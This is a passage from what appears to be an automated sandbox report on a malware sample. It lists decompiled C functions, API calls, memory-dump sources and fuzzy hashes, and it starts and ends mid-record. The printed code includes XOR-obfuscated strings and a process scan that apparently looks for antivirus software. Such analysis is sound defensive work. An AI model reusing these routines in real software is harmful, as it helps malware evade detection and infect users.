                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: ErrorLastObjectSingleWaitwcstombs
                                • String ID:
                                • API String ID: 2344289193-0
                                • Opcode ID: a244645d3585773fa45972b7700847008328fb32f841037ee9cadf4d88fd2bd4
                                • Instruction ID: 8882316caae74f75cec8b57a96b7a634b1ed15ef87be1ab767fa0d04069b9751
                                • Opcode Fuzzy Hash: a244645d3585773fa45972b7700847008328fb32f841037ee9cadf4d88fd2bd4
                                • Instruction Fuzzy Hash: 8E411975A2120AEFDF10DFA4F988AADFBBAFF05254F104479E606E6140D7709A80DB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F5C35, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(80000002), ref: 052F5C8C
                                • SysAllocString.OLEAUT32(052F1E05), ref: 052F5CCF
                                • SysFreeString.OLEAUT32(00000000), ref: 052F5CE3
                                • SysFreeString.OLEAUT32(00000000), ref: 052F5CF1
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: bd1738bdeaa573682117c11a6527fcc096e7e3defaa2a3cc26cf61cab1e8138c
                                • Instruction ID: 1e9469e12f3c01c4a45b1e4c536b7f497eb1f1c2d2b4a24916b1cd04716e2a03
                                • Opcode Fuzzy Hash: bd1738bdeaa573682117c11a6527fcc096e7e3defaa2a3cc26cf61cab1e8138c
                                • Instruction Fuzzy Hash: 20313D76A2010AEFCB05CF98E4C48AEBBB5FF48304B10843EF60A97250DB759585CF61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F73C3, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 87%
                                			E052F73C3(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x52fa2c8; // 0xbd092303
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0x52fa2d4; // 0x215d5a8
				_t3 = _t8 + 0x52fb8a2; // 0x61636f4c
				_t25 = 0;
				_t30 = E052F2DEA(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x52fa2f8, 1, 0, _t30);
					E052F50CA(_t30);
				}
				_t12 =  *0x52fa2b4; // 0x4000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 != 0 && E052F513E() == 0) {
						_t28 =  *0x52fa120( *_t32, 0x20);
						if(_t28 != 0) {
							 *_t28 =  *_t28 & 0x00000000;
							_t28 =  &(_t28[1]);
						}
						_t31 = E052F6BE1(0, _t28,  *_t32, 0);
						if(_t31 == 0) {
							if(_t25 == 0) {
								goto L21;
							}
							_t31 = WaitForSingleObject(_t25, 0x4e20);
							if(_t31 == 0) {
								goto L19;
							}
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E052F51A8(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}















                                0x052f73c4
                                0x052f73cb
                                0x052f73d5
                                0x052f73d9
                                0x052f73df
                                0x052f73ec
                                0x052f73f3
                                0x052f73f7
                                0x052f7409
                                0x052f740b
                                0x052f740b
                                0x052f7410
                                0x052f7417
                                0x052f7422
                                0x052f7438
                                0x052f743c
                                0x052f743e
                                0x052f7443
                                0x052f7443
                                0x052f7450
                                0x052f7454
                                0x052f7458
                                0x00000000
                                0x00000000
                                0x052f7466
                                0x052f746a
                                0x00000000
                                0x00000000
                                0x052f746a
                                0x052f7454
                                0x00000000
                                0x052f746c
                                0x052f746c
                                0x052f746c
                                0x052f7472
                                0x052f7474
                                0x052f7474
                                0x052f747e
                                0x052f7482
                                0x052f7494
                                0x052f7494
                                0x052f7498
                                0x052f749e
                                0x052f749e
                                0x052f74a1
                                0x052f74a3
                                0x052f74a6
                                0x052f74a6
                                0x052f74ad
                                0x052f74b3
                                0x052f74b3

                                APIs
                                  • Part of subcall function 052F2DEA: lstrlen.KERNEL32(E8FA7DD7,00000000,63699BC3,00000027,00000000,07459C98,74ECC740,052F55DE,?,63699BC3,E8FA7DD7,00000000,?,?,?,052F55DE), ref: 052F2E20
                                  • Part of subcall function 052F2DEA: lstrcpy.KERNEL32(00000000,00000000), ref: 052F2E44
                                  • Part of subcall function 052F2DEA: lstrcat.KERNEL32(00000000,00000000), ref: 052F2E4C
                                • CreateEventA.KERNEL32(052FA2F8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,052F30E1,?,?,?), ref: 052F7402
                                  • Part of subcall function 052F50CA: HeapFree.KERNEL32(00000000,00000000,052F4239,00000000,00000001,?,00000000,?,?,?,052F6B8D,00000000,?,00000001), ref: 052F50D6
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,052F30E1,00000000,?,00000000,?,052F30E1,?,?,?,?,?,?,?,052F211B), ref: 052F7460
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,052F30E1,?,?,?), ref: 052F748E
                                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,052F30E1,?,?,?), ref: 052F74A6
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                • String ID:
                                • API String ID: 73268831-0
                                • Opcode ID: 2b6d6ec9f1bcb6da51841b4aa7aab30a8c8ee8b48260c61065f5735685baea12
                                • Instruction ID: c7c499378efe472e957ce8b60d6ab3a5a051784195bd46ea15c7a199f9141827
                                • Opcode Fuzzy Hash: 2b6d6ec9f1bcb6da51841b4aa7aab30a8c8ee8b48260c61065f5735685baea12
                                • Instruction Fuzzy Hash: 3021A5326253136BDB215E68BC49B5BFAB9FF44761F090134FF0A9B280DB70D8404750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F3032, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                Download Yara Rule
                                C-Code - Quality: 39%
                                			E052F3032(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E052F6710(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E052F15B9(_t23);
						}
					}
					return _t38;
				}
				if(E052F4C8C(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x52fa2f8, 1, 0,  *0x52fa394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E052F4039(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E052F1D57(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E052F3C84(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E052F73C3( &_v32, _t39);
					goto L13;
				}
			}












                                0x052f3032
                                0x052f303f
                                0x052f3045
                                0x052f3046
                                0x052f3047
                                0x052f3048
                                0x052f3049
                                0x052f304d
                                0x052f3059
                                0x052f305d
                                0x052f30e5
                                0x052f30e5
                                0x052f30e8
                                0x052f30ea
                                0x052f30f2
                                0x052f30f8
                                0x052f30fb
                                0x052f30fb
                                0x052f30f8
                                0x052f3106
                                0x052f3106
                                0x052f3070
                                0x052f3072
                                0x052f3072
                                0x052f3089
                                0x052f308d
                                0x052f3090
                                0x052f309b
                                0x052f30a2
                                0x052f30a2
                                0x052f30ae
                                0x052f30af
                                0x052f30bd
                                0x052f30b1
                                0x052f30b1
                                0x052f30b2
                                0x052f30b3
                                0x052f30b4
                                0x052f30b5
                                0x052f30b6
                                0x052f30b6
                                0x052f30c2
                                0x052f30c7
                                0x052f30c9
                                0x052f30cb
                                0x052f30cb
                                0x052f30d2
                                0x00000000
                                0x052f30d4
                                0x052f30d4
                                0x052f30e1
                                0x00000000
                                0x052f30e1

                                APIs
                                • CreateEventA.KERNEL32(052FA2F8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730,?,?,?,?,052F211B,?,00000001), ref: 052F3083
                                • SetEvent.KERNEL32(00000000,?,?,?,?,052F211B,?,00000001,052F560C,00000002,?,?,052F560C), ref: 052F3090
                                • Sleep.KERNEL32(00000BB8,?,?,?,?,052F211B,?,00000001,052F560C,00000002,?,?,052F560C), ref: 052F309B
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,052F211B,?,00000001,052F560C,00000002,?,?,052F560C), ref: 052F30A2
                                  • Part of subcall function 052F4039: WaitForSingleObject.KERNEL32(00000000,?,?,?,052F30C2,?,052F30C2,?,?,?,?,?,052F30C2,?), ref: 052F4113
                                  • Part of subcall function 052F4039: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,052F30C2,?,?,?,?,?,052F211B,?), ref: 052F413B
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseEvent$CreateHandleObjectSingleSleepWait
                                • String ID:
                                • API String ID: 467273019-0
                                • Opcode ID: 2e9aab7b03218ac64df98b70da5668701e8abd57ebdcbc13d26697331f2b4e23
                                • Instruction ID: 022f5da553c7a30d81e757cecd4e0bf14d672d23a796bbf7a9d912ffec460ee1
                                • Opcode Fuzzy Hash: 2e9aab7b03218ac64df98b70da5668701e8abd57ebdcbc13d26697331f2b4e23
                                • Instruction Fuzzy Hash: 60214472A20115ABCF10EFE4B889DEEF7A9AF54250B05483AFB15A7140DB71998487A1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F4D09, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 78%
                                			E052F4D09(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E052F6837(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                0x052f4d15
                                0x052f4d19
                                0x052f4d1a
                                0x052f4d1b
                                0x052f4d1d
                                0x052f4d1f
                                0x052f4d24
                                0x052f4d27
                                0x052f4dbe
                                0x052f4dc5
                                0x052f4dc5
                                0x052f4d30
                                0x052f4d37
                                0x052f4d47
                                0x052f4d47
                                0x052f4d4d
                                0x052f4d4f
                                0x052f4d54
                                0x052f4d5d
                                0x052f4d65
                                0x052f4d68
                                0x052f4d73
                                0x052f4d77
                                0x052f4d79
                                0x052f4d7a
                                0x052f4d83
                                0x052f4d87
                                0x052f4d98
                                0x052f4d89
                                0x052f4d8e
                                0x052f4d93
                                0x052f4da2
                                0x052f4da2
                                0x052f4d77
                                0x052f4da8
                                0x052f4dae
                                0x052f4dae
                                0x052f4db7
                                0x052f4dbc
                                0x052f4dbc
                                0x00000000

                                APIs
                                • Sleep.KERNEL32(000000C8), ref: 052F4D37
                                • lstrlenW.KERNEL32(?), ref: 052F4D6D
                                • memcpy.NTDLL(00000000,?,00000000,00000000), ref: 052F4D8E
                                • SysFreeString.OLEAUT32(?), ref: 052F4DA2
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: FreeSleepStringlstrlenmemcpy
                                • String ID:
                                • API String ID: 1198164300-0
                                • Opcode ID: 6faf4de66465fb760d1520fc58b1a19e771b6c8b8cee7218c4677c0f4947bb42
                                • Instruction ID: 1ff0f7802c2ac33fe4b52bb3e688f0cca3dfda753240190237844a1908695a32
                                • Opcode Fuzzy Hash: 6faf4de66465fb760d1520fc58b1a19e771b6c8b8cee7218c4677c0f4947bb42
                                • Instruction Fuzzy Hash: 7F213E75A10219FFCF10EFA8E88899EBBB9FF48211B104179F906D7210EB709A45CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F52E5, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E052F52E5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x52fa290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x52fa2a8; // 0x0
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x52fa2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                0x052f52ed
                                0x052f52f0
                                0x052f52f6
                                0x052f530e
                                0x052f5312
                                0x052f5315
                                0x052f5317
                                0x052f531a
                                0x052f531c
                                0x052f531f
                                0x052f5321
                                0x052f5321
                                0x052f5323
                                0x052f532e
                                0x052f5333
                                0x052f5344
                                0x052f534c
                                0x052f5351
                                0x052f5354
                                0x052f5357
                                0x052f5359
                                0x052f535f
                                0x052f5362
                                0x052f5362
                                0x052f5362
                                0x052f536d
                                0x052f5372
                                0x052f537c

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,052F62E0,00000000,?,00000000,052F70D9,00000000,07459630), ref: 052F52F0
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 052F5308
                                • memcpy.NTDLL(00000000,07459630,-00000008,?,?,?,052F62E0,00000000,?,00000000,052F70D9,00000000,07459630), ref: 052F534C
                                • memcpy.NTDLL(00000001,07459630,00000001,052F70D9,00000000,07459630), ref: 052F536D
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy$AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 1819133394-0
                                • Opcode ID: 08e7699ce2c0eaceb7bce9c7bbb9a4486c67d82f84e94fe599c3b225bfb3831b
                                • Instruction ID: 703696dc6d53c45c2f37eac7d11525163910f1c6c592ba62c1d703bcb2880abe
                                • Opcode Fuzzy Hash: 08e7699ce2c0eaceb7bce9c7bbb9a4486c67d82f84e94fe599c3b225bfb3831b
                                • Instruction Fuzzy Hash: 62110A72B141157FD7148B69FC89E5EBFBDEF80260B040176F50997190EA7099408790
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F578C, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                Download Yara Rule
                                C-Code - Quality: 53%
                                			E052F578C(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E052F6837(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x52f92a4);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x52f92a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}










                                0x052f5797
                                0x052f579b
                                0x052f579d
                                0x052f579e
                                0x052f57a6
                                0x052f57a6
                                0x052f57aa
                                0x00000000
                                0x00000000
                                0x052f57a1
                                0x052f57a2
                                0x052f57a5
                                0x052f57a5
                                0x052f57b2
                                0x052f57b9
                                0x052f57bd
                                0x052f57c5
                                0x052f57cb
                                0x052f57cd
                                0x052f57d2
                                0x052f57d6
                                0x052f57d8
                                0x052f57db
                                0x052f57e2
                                0x052f57e2
                                0x052f57ec
                                0x052f57ef
                                0x052f57f2
                                0x052f57f2
                                0x052f57fe
                                0x052f57fe
                                0x052f580b

                                APIs
                                • StrChrA.SHLWAPI(?,00000020,00000000,0745962C,?,?,?,052F1128,0745962C,?,?,052F55D3), ref: 052F57A6
                                • StrTrimA.SHLWAPI(?,052F92A4,00000002,?,?,?,052F1128,0745962C,?,?,052F55D3), ref: 052F57C5
                                • StrChrA.SHLWAPI(?,00000020,?,?,?,052F1128,0745962C,?,?,052F55D3,?,?,?,?,?,052F6BD8), ref: 052F57D0
                                • StrTrimA.SHLWAPI(00000001,052F92A4,?,?,?,052F1128,0745962C,?,?,052F55D3,?,?,?,?,?,052F6BD8), ref: 052F57E2
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Trim
                                • String ID:
                                • API String ID: 3043112668-0
                                • Opcode ID: 4bd396298a86430216eff3b488721b2d1028080c4ccfbe9b2ed15734fa7a7391
                                • Instruction ID: 35b7f97a405dd5dd0cd02685a7b94a6bb9cdf25ad9402d037239407da2dad33d
                                • Opcode Fuzzy Hash: 4bd396298a86430216eff3b488721b2d1028080c4ccfbe9b2ed15734fa7a7391
                                • Instruction Fuzzy Hash: 7D0152717253129FD3218B55BC4AF2BFE99FF86A60F120529FA45D7240DBA1C80187A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F513E, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E052F513E() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x52fa2d4; // 0x215d5a8
						_t2 = _t9 + 0x52fbdd4; // 0x73617661
						_push( &_v264);
						if( *0x52fa118() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                0x052f5149
                                0x052f5153
                                0x052f5157
                                0x052f5161
                                0x052f5192
                                0x052f5168
                                0x052f516d
                                0x052f517a
                                0x052f5183
                                0x052f519a
                                0x052f5185
                                0x052f518d
                                0x00000000
                                0x052f518d
                                0x052f519b
                                0x052f519c
                                0x00000000
                                0x052f519c
                                0x00000000
                                0x052f5196
                                0x052f51a2
                                0x052f51a7

                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 052F514E
                                • Process32First.KERNEL32(00000000,?), ref: 052F5161
                                • Process32Next.KERNEL32(00000000,?), ref: 052F518D
                                • CloseHandle.KERNEL32(00000000), ref: 052F519C
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 6155540a82153a747ec83742b9200bddea84b6d279c846256ae9f918e89d6f18
                                • Instruction ID: 758ab3a06a71217f2d4579a2fff9f8a09fafa6b5f8b05fcfd7853807d55afb8a
                                • Opcode Fuzzy Hash: 6155540a82153a747ec83742b9200bddea84b6d279c846256ae9f918e89d6f18
                                • Instruction Fuzzy Hash: D5F0BB323211256AD720E666BC4DEEBB7ADDFC5210F010171FB4AC2040FB34A9868BA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F5076, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E052F5076() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x52fa2c4; // 0x30c
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x52fa308; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x52fa2c4; // 0x30c
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x52fa290; // 0x7060000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                0x052f5076
                                0x052f507d
                                0x052f50c7
                                0x052f50c9
                                0x052f50c9
                                0x052f5081
                                0x052f5087
                                0x052f508c
                                0x052f5090
                                0x052f5096
                                0x052f509d
                                0x00000000
                                0x00000000
                                0x052f509f
                                0x052f50a4
                                0x00000000
                                0x00000000
                                0x00000000
                                0x052f50a4
                                0x052f50a6
                                0x052f50ae
                                0x052f50b1
                                0x052f50b1
                                0x052f50b7
                                0x052f50be
                                0x052f50c1
                                0x052f50c1
                                0x00000000

                                APIs
                                • SetEvent.KERNEL32(0000030C,00000001,052F56C9), ref: 052F5081
                                • SleepEx.KERNEL32(00000064,00000001), ref: 052F5090
                                • CloseHandle.KERNEL32(0000030C), ref: 052F50B1
                                • HeapDestroy.KERNEL32(07060000), ref: 052F50C1
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseDestroyEventHandleHeapSleep
                                • String ID:
                                • API String ID: 4109453060-0
                                • Opcode ID: 045a5331579e647195020b2e715a5345b254c951bdaab93409063079021e8ecd
                                • Instruction ID: d9de0b71dc4318bf27b42b49887692666ae37c1e9fdacb2c5e10f3b17fba5e8a
                                • Opcode Fuzzy Hash: 045a5331579e647195020b2e715a5345b254c951bdaab93409063079021e8ecd
                                • Instruction Fuzzy Hash: A0F0AC71B353129BDA205A75B94EF5A7BA8BF09B71B040538BD09D76C0DF25D4848B90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F10DD, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 50%
                                			E052F10DD(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x52fa37c; // 0x7459630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x52fa37c; // 0x7459630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x52fa030) {
					HeapFree( *0x52fa290, 0, _t8);
				}
				_t14[1] = E052F578C(_v0, _t14);
				_t11 =  *0x52fa37c; // 0x7459630
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                0x052f10dd
                                0x052f10dd
                                0x052f10e6
                                0x052f10f6
                                0x052f10f6
                                0x052f10fb
                                0x052f1100
                                0x00000000
                                0x00000000
                                0x052f10f0
                                0x052f10f0
                                0x052f1102
                                0x052f1106
                                0x052f1118
                                0x052f1118
                                0x052f1128
                                0x052f112b
                                0x052f1130
                                0x052f1134
                                0x052f113a

                                APIs
                                • RtlEnterCriticalSection.NTDLL(074595F0), ref: 052F10E6
                                • Sleep.KERNEL32(0000000A,?,?,052F55D3,?,?,?,?,?,052F6BD8,?,00000001), ref: 052F10F0
